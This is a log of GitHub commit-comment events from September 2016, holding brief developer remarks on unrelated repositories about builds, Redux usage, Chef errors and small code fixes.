{"id":"4544933236","type":"CommitCommentEvent","actor":{"login":"miclovich"},"repo":{"name":"miclovich/rr-redux"},"payload":{"comment":{"id":18975404,"position":null,"line":null,"path":null,"commit_id":"2ce92f92648dd9fc7fd61aef6014d424e902ad9f","created_at":"2016-09-10T23:53:27Z","updated_at":"2016-09-10T23:53:27Z","body":"@chieakiba; the build has been ignored. In a fullstack setting, after the code has been tested and pushed to a CI server like Travis-CI, we'll deploy automatically. Our deployment will include having to run build commands on the server and not in the repository. \r\n\r\nThis has been ignored."}},"created_at":"2016-09-10T23:53:27Z"}
{"id":"4544933293","type":"CommitCommentEvent","actor":{"login":"ninaholic"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975405,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:53:29Z","updated_at":"2016-09-10T23:53:29Z","body":"Oh, I've never tried qemu, but 6.9.6 and a build today is working ok for me (frugal install on HDD).\r\n\r\nI hope you have a great holiday @01micko  :palm_tree: :tropical_drink: "}},"created_at":"2016-09-10T23:53:29Z"}
{"id":"4544933349","type":"CommitCommentEvent","actor":{"login":"antigenx"},"repo":{"name":"antigenx/xbmc-repo-agx"},"payload":{"comment":{"id":18975406,"position":25,"line":65,"path":"plugin.video.gayboystube/addon.py","commit_id":"e6ce47fcb044274070a79cd3bdafbdcb7cfdc313","created_at":"2016-09-10T23:53:33Z","updated_at":"2016-09-10T23:53:33Z","body":"whoops.. leftover artifact from a failed approach. note to self: remove channel=None."}},"created_at":"2016-09-10T23:53:33Z"}
{"id":"4544933688","type":"CommitCommentEvent","actor":{"login":"mateor"},"repo":{"name":"foursquare/fsqio"},"payload":{"comment":{"id":18975407,"position":null,"line":null,"path":null,"commit_id":"3cfa2b98b31de7f8ea13fea79ba7ef4a3653482c","created_at":"2016-09-10T23:53:51Z","updated_at":"2016-09-10T23:53:51Z","body":"Fsq.io consumers can dynamically switch to the upstream Scala repl by passing\r\n\r\n      ./pants --repl-scala-main=scala.tools.nsc.MainGenericRunner $TARGET\r\n\r\nLoading scripts also has a slightly divergent call, Ammonite uses `--predef-file` instead of `-i`."}},"created_at":"2016-09-10T23:53:51Z"}
{"id":"4544934037","type":"CommitCommentEvent","actor":{"login":"miclovich"},"repo":{"name":"chieakiba/rr-redux"},"payload":{"comment":{"id":18975409,"position":5,"line":10,"path":"index.html","commit_id":"7caff121efac7200ed16decbe07d4cb1dba22a01","created_at":"2016-09-10T23:54:12Z","updated_at":"2016-09-10T23:54:12Z","body":"@chieakiba please don't forget this step. We use the \"future\" file to be as the correct file path"}},"created_at":"2016-09-10T23:54:12Z"}
{"id":"4544934104","type":"CommitCommentEvent","actor":{"login":"atarijeff"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":18975410,"position":null,"line":null,"path":null,"commit_id":"a75c8bdfb0726c7a09406dbf14803e5aa47a9c02","created_at":"2016-09-10T23:54:16Z","updated_at":"2016-09-10T23:54:16Z","body":"I modified MediaFile.jar and just replaced the Sage.jar file (in Windows). It might be something with my local setup because it tunes correctly.\r\n"}},"created_at":"2016-09-10T23:54:16Z"}
{"id":"4544934881","type":"CommitCommentEvent","actor":{"login":"Mike-j-t"},"repo":{"name":"Mike-j-t/ACSCalc"},"payload":{"comment":{"id":18975411,"position":null,"line":null,"path":null,"commit_id":"1090ea87d067dea90db8bf4e26f85614dfbe51c3","created_at":"2016-09-10T23:55:07Z","updated_at":"2016-09-10T23:55:07Z","body":"OK "}},"created_at":"2016-09-10T23:55:07Z"}
{"id":"4544934987","type":"CommitCommentEvent","actor":{"login":"TreffnonX"},"repo":{"name":"chaitu236/TakWeb"},"payload":{"comment":{"id":18975412,"position":null,"line":null,"path":null,"commit_id":"824dbf6bb73167b553005fb3265249bc0cdf6cd3","created_at":"2016-09-10T23:55:12Z","updated_at":"2016-09-10T23:55:12Z","body":"Actually it does not add the space. I am completely wrong. Also I am tired. I will not do any debugging tonight. Going to go about this tomorrow. Til then..."}},"created_at":"2016-09-10T23:55:12Z"}
{"id":"4544936422","type":"CommitCommentEvent","actor":{"login":"jchudb93"},"repo":{"name":"jchudb93/TareaLP2"},"payload":{"comment":{"id":18975413,"position":null,"line":null,"path":null,"commit_id":"18fe9a36a8dd60e046ca816ef6323d735422ef1c","created_at":"2016-09-10T23:56:36Z","updated_at":"2016-09-10T23:56:36Z","body":"Falta agregar notas a los eventos y probar la persistencia en la encuestas.\r\nEsto se encuentra en la clase Encuesta con los métodos cargar preguntas e insertar preguntas"}},"created_at":"2016-09-10T23:56:36Z"}
{"id":"4544937434","type":"CommitCommentEvent","actor":{"login":"con-f-use"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18975414,"position":null,"line":null,"path":null,"commit_id":"39ecd7ad42c130219fd540943730cf43622f5924","created_at":"2016-09-10T23:57:30Z","updated_at":"2016-09-10T23:57:30Z","body":"Forgot to say that closes #23"}},"created_at":"2016-09-10T23:57:30Z"}
{"id":"4544938356","type":"CommitCommentEvent","actor":{"login":"con-f-use"},"repo":{"name":"cnlohr/esp8266ws2812i2s"},"payload":{"comment":{"id":18975416,"position":null,"line":null,"path":null,"commit_id":"0f5deeb1ccfadc3d3b280be0bd95b9b16af5d13a","created_at":"2016-09-10T23:58:17Z","updated_at":"2016-09-10T23:58:17Z","body":"Closes #24"}},"created_at":"2016-09-10T23:58:17Z"}
{"id":"4544939076","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18975418,"position":null,"line":null,"path":null,"commit_id":"8cf7a83574a1bf314bd17808e7b7785a8562f03e","created_at":"2016-09-10T23:58:51Z","updated_at":"2016-09-10T23:58:51Z","body":"Related to: backdrop/backdrop-issues#844 "}},"created_at":"2016-09-10T23:58:51Z"}
{"id":"4544939356","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18975419,"position":null,"line":null,"path":null,"commit_id":"1354d6ca23f530ee2a872a72697ee7b9a2266808","created_at":"2016-09-10T23:59:05Z","updated_at":"2016-09-10T23:59:05Z","body":"Thanks @ninaholic \r\n\r\nI may have jumped the gun.. I might have a mistake in menu.lst.."}},"created_at":"2016-09-10T23:59:05Z"}
{"id":"4543338074","type":"CommitCommentEvent","actor":{"login":"Warlockbugs"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18972293,"position":null,"line":null,"path":null,"commit_id":"61fc35b3c83f15aa548bd68a111f8d21a921b18a","created_at":"2016-09-10T03:00:15Z","updated_at":"2016-09-10T03:00:15Z","body":"The fix was merged."}},"created_at":"2016-09-10T03:00:15Z"}
{"id":"4543344430","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/Infinideastudio-Frameworks"},"payload":{"comment":{"id":18972298,"position":7,"line":6,"path":"README.md","commit_id":"698e9d192fde627eafb7fde8363863efb369c8f2","created_at":"2016-09-10T03:05:01Z","updated_at":"2016-09-10T03:05:01Z","body":"什么鬼，Markdown里为什么写了HTML\r\n应该在行末加两个空格\r\n就算要用br，也应该是`<br/>`"}},"created_at":"2016-09-10T03:05:01Z"}
{"id":"4543345636","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":18972304,"position":10,"line":1183,"path":"commands.js","commit_id":"1653a1f69254d03d47245acc290953e580e7d33e","created_at":"2016-09-10T03:06:04Z","updated_at":"2016-09-10T03:06:04Z","body":"It's ``modjoin``, not ``modJoin``"}},"created_at":"2016-09-10T03:06:04Z"}
{"id":"4543346101","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18972308,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T03:06:25Z","updated_at":"2016-09-10T03:06:25Z","body":"@abc612008 不要碰到网络就好，客户端我没改，UI什么的随便，我会定期merge下renew"}},"created_at":"2016-09-10T03:06:25Z"}
{"id":"4543347185","type":"CommitCommentEvent","actor":{"login":"rednewguy"},"repo":{"name":"openbmc/docs"},"payload":{"comment":{"id":18972309,"position":18,"line":57,"path":"cheatsheet.md","commit_id":"8196be3e52d7c6268dd641e92b4768dbc433d03e","created_at":"2016-09-10T03:07:16Z","updated_at":"2016-09-10T03:07:16Z","body":"An example would be really helpful here. "}},"created_at":"2016-09-10T03:07:16Z"}
{"id":"4543352274","type":"CommitCommentEvent","actor":{"login":"lukedjohnson"},"repo":{"name":"lukedjohnson/CS2321"},"payload":{"comment":{"id":18972315,"position":27,"line":0,"path":"src/cs2321/DoublyLinkedList.java","commit_id":"2eb6d83e81e54307248ec64fae6484dd502d83e2","created_at":"2016-09-10T03:11:20Z","updated_at":"2016-09-10T03:11:20Z","body":"Why would you do that you sick fuck. "}},"created_at":"2016-09-10T03:11:20Z"}
{"id":"4543352597","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18972316,"position":null,"line":null,"path":null,"commit_id":"7f8501cb80e16e7950a40a38d58464436fa1602e","created_at":"2016-09-10T03:11:37Z","updated_at":"2016-09-10T03:11:37Z","body":"buildingunit (Unknown) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f8501cb80e16e7950a40a38d58464436fa1602e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7f8501cb80e16e7950a40a38d58464436fa1602e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-10T03:11:37Z"}
{"id":"4543356537","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18972320,"position":null,"line":null,"path":null,"commit_id":"fe65ba628f2d6a84d469450cfd3265ef7b0b957b","created_at":"2016-09-10T03:14:47Z","updated_at":"2016-09-10T03:14:47Z","body":"@mcostalba Since voyagerOne pointed out some simplification aspect of this patch I'd like to ask you which are the correct bounds to test this at LTC, thanks."}},"created_at":"2016-09-10T03:14:47Z"}
{"id":"4543361701","type":"CommitCommentEvent","actor":{"login":"djdoublej"},"repo":{"name":"djdoublej/uv-mapping-practice-bunker"},"payload":{"comment":{"id":18972324,"position":null,"line":null,"path":null,"commit_id":"e75e9038e7f90b55b474b3372babe985ca21dceb","created_at":"2016-09-10T03:19:00Z","updated_at":"2016-09-10T03:19:00Z","body":"I have literally no idea how to use Github. Hopefully this works.\r\n\r\nAlso, couldn't find the practice image to help with smoothing out the UV maps, so I don't know if it works good or not."}},"created_at":"2016-09-10T03:19:00Z"}
{"id":"4543363698","type":"CommitCommentEvent","actor":{"login":"NawtJ0sh"},"repo":{"name":"notnola/pinychat"},"payload":{"comment":{"id":18972326,"position":null,"line":null,"path":null,"commit_id":"e44d7d409235ec508281c6a942151df1363f6116","created_at":"2016-09-10T03:20:41Z","updated_at":"2016-09-10T03:20:41Z","body":"Rip pinychat. lol"}},"created_at":"2016-09-10T03:20:41Z"}
{"id":"4543364109","type":"CommitCommentEvent","actor":{"login":"markerikson"},"repo":{"name":"reactjs/redux"},"payload":{"comment":{"id":18972327,"position":null,"line":null,"path":null,"commit_id":"def86ae9af3b85259d167913b7eb81e677c5cb05","created_at":"2016-09-10T03:20:59Z","updated_at":"2016-09-10T03:20:59Z","body":"@halt-hammerzeit : Actually, `connect` will automatically do that for you if you provide an object full of action creators as the second argument to `connect` instead of a `mapDispatch` function:\r\n\r\n```js\r\nexport default connect(null,  {actionCreator1, actionCreator2})(MyComponent);\r\n```\r\n\r\nSee https://github.com/reactjs/react-redux/blob/master/docs/api.md#connectmapstatetoprops-mapdispatchtoprops-mergeprops-options ."}},"created_at":"2016-09-10T03:20:59Z"}
{"id":"4543366883","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18972332,"position":null,"line":null,"path":null,"commit_id":"70691b5211e3613665e227edf49c58cb18f8793a","created_at":"2016-09-10T03:23:15Z","updated_at":"2016-09-10T03:23:15Z","body":"What was the bug?"}},"created_at":"2016-09-10T03:23:15Z"}
{"id":"4543367085","type":"CommitCommentEvent","actor":{"login":"kobe990"},"repo":{"name":"macacajs/wd.java"},"payload":{"comment":{"id":18972333,"position":null,"line":null,"path":null,"commit_id":"d0d942ee0aef452882a42d7b72bd6bb97e595508","created_at":"2016-09-10T03:23:26Z","updated_at":"2016-09-10T03:23:26Z","body":"👍 "}},"created_at":"2016-09-10T03:23:26Z"}
{"id":"4543367873","type":"CommitCommentEvent","actor":{"login":"halt-hammerzeit"},"repo":{"name":"reactjs/redux"},"payload":{"comment":{"id":18972339,"position":null,"line":null,"path":null,"commit_id":"def86ae9af3b85259d167913b7eb81e677c5cb05","created_at":"2016-09-10T03:24:05Z","updated_at":"2016-09-10T03:24:05Z","body":"@markerikson wow, have been using Redux for more than a year and didn't even know about that feature.\r\nthat's gonna be definitely less clutter in my components code."}},"created_at":"2016-09-10T03:24:05Z"}
{"id":"4543371335","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/jMAVSim"},"payload":{"comment":{"id":18972343,"position":null,"line":null,"path":null,"commit_id":"bf1490e35d9a47da09b56c7f78c4edd96a13a701","created_at":"2016-09-10T03:26:59Z","updated_at":"2016-09-10T03:26:59Z","body":"Does this imply that you're arming at 50% throttle? \r\nI find that one now needs over 60% throttle to hover the Iris.\r\nIs this unique to SITL, or do we have a real safety problem here?"}},"created_at":"2016-09-10T03:26:59Z"}
{"id":"4543376248","type":"CommitCommentEvent","actor":{"login":"Seliro"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18972346,"position":null,"line":null,"path":null,"commit_id":"70691b5211e3613665e227edf49c58cb18f8793a","created_at":"2016-09-10T03:31:16Z","updated_at":"2016-09-10T03:31:16Z","body":"not being able to click the ladder if item on it"}},"created_at":"2016-09-10T03:31:16Z"}
{"id":"4543379160","type":"CommitCommentEvent","actor":{"login":"m-ric"},"repo":{"name":"dask/distributed"},"payload":{"comment":{"id":18972350,"position":null,"line":null,"path":null,"commit_id":"28c2c52ac853877bf1fbfc7918a596346fe38205","created_at":"2016-09-10T03:33:56Z","updated_at":"2016-09-10T03:33:56Z","body":"That does not fix my issue #477. In my case,\r\nsys.executable == python\r\nos.path.dirname(...) == /usr/bin/python\r\nbinname == /usr/bin/bokeh => no such file or directory"}},"created_at":"2016-09-10T03:33:56Z"}
{"id":"4543379213","type":"CommitCommentEvent","actor":{"login":"mutantmonkey"},"repo":{"name":"mutantmonkey/alpine-appvm"},"payload":{"comment":{"id":18972351,"position":null,"line":null,"path":null,"commit_id":"cf4a48974b79176ca815208c8a9d6e93f159d135","created_at":"2016-09-10T03:33:59Z","updated_at":"2016-09-10T03:33:59Z","body":"It could work, but I don't really use chromium much, so I'm not really sure I'd be willing to put in the effort to maintain that."}},"created_at":"2016-09-10T03:33:59Z"}
{"id":"4543381910","type":"CommitCommentEvent","actor":{"login":"kasanielaski"},"repo":{"name":"kaa123/chokoRabbit"},"payload":{"comment":{"id":18972357,"position":61,"line":61,"path":"style.css","commit_id":"fa2ddae7cb99c07108e953276314ee209b41feb9","created_at":"2016-09-10T03:36:24Z","updated_at":"2016-09-10T03:36:24Z","body":"margin 140px 40px"}},"created_at":"2016-09-10T03:36:24Z"}
{"id":"4543384880","type":"CommitCommentEvent","actor":{"login":"kasanielaski"},"repo":{"name":"kaa123/chokoRabbit"},"payload":{"comment":{"id":18972362,"position":null,"line":null,"path":null,"commit_id":"fa2ddae7cb99c07108e953276314ee209b41feb9","created_at":"2016-09-10T03:39:08Z","updated_at":"2016-09-10T03:39:08Z","body":"comic sans I'm shoked"}},"created_at":"2016-09-10T03:39:08Z"}
{"id":"4543392864","type":"CommitCommentEvent","actor":{"login":"bktSon"},"repo":{"name":"bktSon/DDD-Express"},"payload":{"comment":{"id":18972377,"position":32,"line":32,"path":"test/basic.spec.js","commit_id":"cc08ba06ee7f9a8fde3a26697b19cad31aa2228e","created_at":"2016-09-10T03:46:19Z","updated_at":"2016-09-10T03:46:19Z","body":"sdc\r\n"}},"created_at":"2016-09-10T03:46:19Z"}
{"id":"4543393092","type":"CommitCommentEvent","actor":{"login":"bktSon"},"repo":{"name":"bktSon/DDD-Express"},"payload":{"comment":{"id":18972378,"position":33,"line":33,"path":"test/basic.spec.js","commit_id":"cc08ba06ee7f9a8fde3a26697b19cad31aa2228e","created_at":"2016-09-10T03:46:34Z","updated_at":"2016-09-10T03:46:34Z","body":"asdas"}},"created_at":"2016-09-10T03:46:34Z"}
{"id":"4543393222","type":"CommitCommentEvent","actor":{"login":"bktSon"},"repo":{"name":"bktSon/DDD-Express"},"payload":{"comment":{"id":18972379,"position":33,"line":33,"path":"test/basic.spec.js","commit_id":"cc08ba06ee7f9a8fde3a26697b19cad31aa2228e","created_at":"2016-09-10T03:46:41Z","updated_at":"2016-09-10T03:46:41Z","body":"asda"}},"created_at":"2016-09-10T03:46:41Z"}
{"id":"4543394073","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"babymannen/theforgottenserver-7.4"},"payload":{"comment":{"id":18972381,"position":null,"line":null,"path":null,"commit_id":"70691b5211e3613665e227edf49c58cb18f8793a","created_at":"2016-09-10T03:47:29Z","updated_at":"2016-09-10T03:47:29Z","body":"@Seliro thanks =)"}},"created_at":"2016-09-10T03:47:29Z"}
{"id":"4543396335","type":"CommitCommentEvent","actor":{"login":"carlosrxavier"},"repo":{"name":"carlosrxavier/hello-word"},"payload":{"comment":{"id":18972382,"position":null,"line":null,"path":null,"commit_id":"92a349cbc81d3e3d9d0ac82671f4d3f158fd6ab0","created_at":"2016-09-10T03:49:44Z","updated_at":"2016-09-10T03:49:44Z","body":"apenas testando"}},"created_at":"2016-09-10T03:49:44Z"}
{"id":"4543396435","type":"CommitCommentEvent","actor":{"login":"poliva83"},"repo":{"name":"johnbellone/vault-cookbook"},"payload":{"comment":{"id":18972384,"position":6,"line":5,"path":"Policyfile.rb","commit_id":"2b199d564a40c3881e5557bec328e00b438671cb","created_at":"2016-09-10T03:49:50Z","updated_at":"2016-09-10T03:49:50Z","body":"@johnbellone removing the named_run_list broke chef-client run when running via test-kitchen.\r\n\r\n```\r\nChef::PolicyBuilder::Policyfile::ConfigurationError: Policy 'default' revision '92647b3ca325b9eb3ae8dd2670dcfc86e88cd0b899ceb1c41affc3f606be5e2b' does not have named_run_list 'ubuntu'(available named_run_lists: [])\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/policy_builder/policyfile.rb:259:in `run_list'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/policy_builder/policyfile.rb:291:in `validate_policyfile'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/policy_builder/policyfile.rb:116:in `finish_load_node'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/policy_builder/dynamic.rb:75:in `load_node'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/client.rb:467:in `load_node'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/client.rb:269:in `run'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application.rb:302:in `block in fork_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application.rb:290:in `fork'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application.rb:290:in `fork_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application.rb:255:in `block in run_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/local_mode.rb:44:in `with_server_connectivity'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application.rb:243:in `run_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application/client.rb:464:in `sleep_then_run_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application/client.rb:451:in `block in interval_run_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application/client.rb:450:in `loop'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application/client.rb:450:in `interval_run_chef_client'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application/client.rb:434:in `run_application'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/lib/chef/application.rb:60:in `run'\r\n/opt/chef/embedded/lib/ruby/gems/2.1.0/gems/chef-12.13.37/bin/chef-client:26:in `<top (required)>'\r\n/opt/chef/bin/chef-client:53:in `load'\r\n/opt/chef/bin/chef-client:53:in `<main>'\r\n```"}},"created_at":"2016-09-10T03:49:50Z"}
{"id":"4543397324","type":"CommitCommentEvent","actor":{"login":"lukicweb"},"repo":{"name":"travisgoodspeed/MD380Tool"},"payload":{"comment":{"id":18972387,"position":null,"line":null,"path":null,"commit_id":"0bbd11d90f12ff2acc8076a6a58a72851598a8eb","created_at":"2016-09-10T03:50:38Z","updated_at":"2016-09-10T03:50:38Z","body":"Any updates ? I tested the app and loved it. Good work @travisgoodspeed "}},"created_at":"2016-09-10T03:50:38Z"}
{"id":"4543397654","type":"CommitCommentEvent","actor":{"login":"khipkin"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18972388,"position":null,"line":null,"path":null,"commit_id":"f496a6b0c75645aa38f76600d357e291f80d4f50","created_at":"2016-09-10T03:50:55Z","updated_at":"2016-09-10T03:50:55Z","body":"Rebirth cost never ended up being pulled into a constant."}},"created_at":"2016-09-10T03:50:55Z"}
{"id":"4543399370","type":"CommitCommentEvent","actor":{"login":"khipkin"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18972391,"position":null,"line":null,"path":null,"commit_id":"f496a6b0c75645aa38f76600d357e291f80d4f50","created_at":"2016-09-10T03:52:23Z","updated_at":"2016-09-10T03:52:23Z","body":"Oh @crookedneighbor, is that what you meant by \"I've decided to hold off on adding the orb of rebirth data to the content file\" [here](https://github.com/HabitRPG/habitrpg/pull/7944#issuecomment-246082103)?"}},"created_at":"2016-09-10T03:52:23Z"}
{"id":"4543401486","type":"CommitCommentEvent","actor":{"login":"rayleeriver"},"repo":{"name":"ablox/replicat"},"payload":{"comment":{"id":18972396,"position":null,"line":null,"path":null,"commit_id":"79dc89a50a310e1c4b58c929bacc8070673f3158","created_at":"2016-09-10T03:54:35Z","updated_at":"2016-09-10T03:54:35Z","body":"Nice.. progressing!"}},"created_at":"2016-09-10T03:54:35Z"}
{"id":"4543403304","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18972398,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T03:56:28Z","updated_at":"2016-09-10T03:56:28Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-10T03:56:28Z"}
{"id":"4543403362","type":"CommitCommentEvent","actor":{"login":"shanghaitong"},"repo":{"name":"shanghaitong/easytrader"},"payload":{"comment":{"id":18972399,"position":null,"line":null,"path":null,"commit_id":"74aee8854b02c8b4e3b16c7eb3ee177a1cc094ed","created_at":"2016-09-10T03:56:32Z","updated_at":"2016-09-10T03:56:32Z","body":"business_amount改为int"}},"created_at":"2016-09-10T03:56:32Z"}
{"id":"4543404686","type":"CommitCommentEvent","actor":{"login":"shanghaitong"},"repo":{"name":"shanghaitong/easytrader"},"payload":{"comment":{"id":18972400,"position":null,"line":null,"path":null,"commit_id":"14cd89e66f2d08804a78500cb3f3730bc02ee14d","created_at":"2016-09-10T03:57:45Z","updated_at":"2016-09-10T03:57:45Z","body":"新增查询当日成交"}},"created_at":"2016-09-10T03:57:45Z"}
{"id":"4543404845","type":"CommitCommentEvent","actor":{"login":"tlarson07"},"repo":{"name":"tlarson07/tlarson07.github.io"},"payload":{"comment":{"id":18972401,"position":15,"line":43,"path":"index.html","commit_id":"30ddfea46453e771575937776a97e51ce1d39089","created_at":"2016-09-10T03:57:56Z","updated_at":"2016-09-10T03:57:56Z","body":"incorrect phone number updated in later version"}},"created_at":"2016-09-10T03:57:56Z"}
{"id":"4543405940","type":"CommitCommentEvent","actor":{"login":"shanghaitong"},"repo":{"name":"shanghaitong/easytrader"},"payload":{"comment":{"id":18972403,"position":null,"line":null,"path":null,"commit_id":"d9a559cc1dd78d146515803fdc224d7908a6cc07","created_at":"2016-09-10T03:58:58Z","updated_at":"2016-09-10T03:58:58Z","body":"修复查询当日委托\n新增查询当日成交"}},"created_at":"2016-09-10T03:58:58Z"}
{"id":"4543406785","type":"CommitCommentEvent","actor":{"login":"DannyZielinski"},"repo":{"name":"DannyZielinski/ProgrammingAssignment2"},"payload":{"comment":{"id":18972405,"position":null,"line":null,"path":null,"commit_id":"15d2b0dcc1ab28c5dfd1d9298b4f6e1cf3c58f88","created_at":"2016-09-10T03:59:37Z","updated_at":"2016-09-10T03:59:37Z","body":"Week 3 R Programming Lexical Scoping"}},"created_at":"2016-09-10T03:59:37Z"}
{"id":"4543410075","type":"CommitCommentEvent","actor":{"login":"shanghaitong"},"repo":{"name":"shanghaitong/easytrader"},"payload":{"comment":{"id":18972411,"position":null,"line":null,"path":null,"commit_id":"11a1e01da9470ce029e32cb80c5f4706720f4a2d","created_at":"2016-09-10T04:01:56Z","updated_at":"2016-09-10T04:01:56Z","body":"新增log.propagate设置为False"}},"created_at":"2016-09-10T04:01:56Z"}
{"id":"4543411167","type":"CommitCommentEvent","actor":{"login":"shanghaitong"},"repo":{"name":"shanghaitong/easytrader"},"payload":{"comment":{"id":18972414,"position":null,"line":null,"path":null,"commit_id":"c843e13e70407c7d0b3b6f1dc3576d1ee5e72fdd","created_at":"2016-09-10T04:02:57Z","updated_at":"2016-09-10T04:02:57Z","body":"新增logout方法"}},"created_at":"2016-09-10T04:02:57Z"}
{"id":"4543412945","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18972419,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T04:04:14Z","updated_at":"2016-09-10T04:04:14Z","body":"Viel Glück für LTC!"}},"created_at":"2016-09-10T04:04:14Z"}
{"id":"4543413612","type":"CommitCommentEvent","actor":{"login":"FullGreen"},"repo":{"name":"FullGreen/build_script"},"payload":{"comment":{"id":18972420,"position":null,"line":null,"path":null,"commit_id":"87478d768d30799928c128d6f0295c2ef80c6ba6","created_at":"2016-09-10T04:04:51Z","updated_at":"2016-09-10T04:04:51Z","body":"죄송합니다"}},"created_at":"2016-09-10T04:04:51Z"}
{"id":"4543413962","type":"CommitCommentEvent","actor":{"login":"crookedneighbor"},"repo":{"name":"HabitRPG/habitrpg"},"payload":{"comment":{"id":18972421,"position":null,"line":null,"path":null,"commit_id":"f496a6b0c75645aa38f76600d357e291f80d4f50","created_at":"2016-09-10T04:05:10Z","updated_at":"2016-09-10T04:05:10Z","body":"Yes."}},"created_at":"2016-09-10T04:05:10Z"}
{"id":"4543415509","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18972426,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-10T04:06:29Z","updated_at":"2016-09-10T04:06:29Z","body":"Hi , how to deploy the latest  GAE remote server ?"}},"created_at":"2016-09-10T04:06:29Z"}
{"id":"4543424575","type":"CommitCommentEvent","actor":{"login":"oldmud0"},"repo":{"name":"Grayson112233/pygame-physics"},"payload":{"comment":{"id":18972432,"position":null,"line":null,"path":null,"commit_id":"712630f19df253008859f4029781cd71d3c8f3a3","created_at":"2016-09-10T04:14:51Z","updated_at":"2016-09-10T04:14:51Z","body":"https://github.com/oldmud0/zero-grav-soccer\r\n\r\nYou're going to have a bad time"}},"created_at":"2016-09-10T04:14:51Z"}
